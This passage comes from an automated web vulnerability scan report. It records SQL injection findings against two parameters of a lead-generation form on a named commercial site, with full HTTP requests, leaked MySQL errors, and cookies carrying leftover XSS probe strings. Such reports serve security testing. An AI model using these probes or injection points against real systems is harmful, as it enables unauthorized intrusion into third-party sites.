OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:57:57 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=jqrrcmlge5flidmj1hhgu5p632; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16242


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.283. http://www.insideup.com/ppc/leadflow/fist00/project.php [attributeId_342_g parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/fist00/project.php

Issue detail

The attributeId_342_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_342_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance'&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_452%5B%5D=2936__Financial+statement+creation&attributeId_453=2944__No+-+No+preference&attributeId_454=2948__Not+sure&attributeId_455=2955__ASAP&attributeId_456=2961__Still+in+the+planning+stages&attributeId_457=2968__Less+than+%24100%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=10003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:58:08 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=38tfnmmfpggg942m1k1th5feb5; path=/
Content-Length: 6510
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
es&attributeId_457=2968__Less than $100,000&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=10003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2936__Financial statement creation&attributeId_453=2944__No - No preference&a' at line 5

Request 2

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance''&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_452%5B%5D=2936__Financial+statement+creation&attributeId_453=2944__No+-+No+preference&attributeId_454=2948__Not+sure&attributeId_455=2955__ASAP&attributeId_456=2961__Still+in+the+planning+stages&attributeId_457=2968__Less+than+%24100%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=10003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:58:42 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=iaoqomqfii63o0facanbm08nl6; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16242


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.284. http://www.insideup.com/ppc/leadflow/fist00/project.php [attributeId_343_g parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/fist00/project.php

Issue detail

The attributeId_343_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_343_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9'&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_452%5B%5D=2936__Financial+statement+creation&attributeId_453=2944__No+-+No+preference&attributeId_454=2948__Not+sure&attributeId_455=2955__ASAP&attributeId_456=2961__Still+in+the+planning+stages&attributeId_457=2968__Less+than+%24100%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=10003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:58:45 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=6nfte34b5vhi12653e496qkua2; path=/
Content-Length: 6510
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
es&attributeId_457=2968__Less than $100,000&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=10003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2936__Financial statement creation&attributeId_453=2944__No - No preference&a' at line 5

Request 2

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9''&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_452%5B%5D=2936__Financial+statement+creation&attributeId_453=2944__No+-+No+preference&attributeId_454=2948__Not+sure&attributeId_455=2955__ASAP&attributeId_456=2961__Still+in+the+planning+stages&attributeId_457=2968__Less+than+%24100%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=10003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 